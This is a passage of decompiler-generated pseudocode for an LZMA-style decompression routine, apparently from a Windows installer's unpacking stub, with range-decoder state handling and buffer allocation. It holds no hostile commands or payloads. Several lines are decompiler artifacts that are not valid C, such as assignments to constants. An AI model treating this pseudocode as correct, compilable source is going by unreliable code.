						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
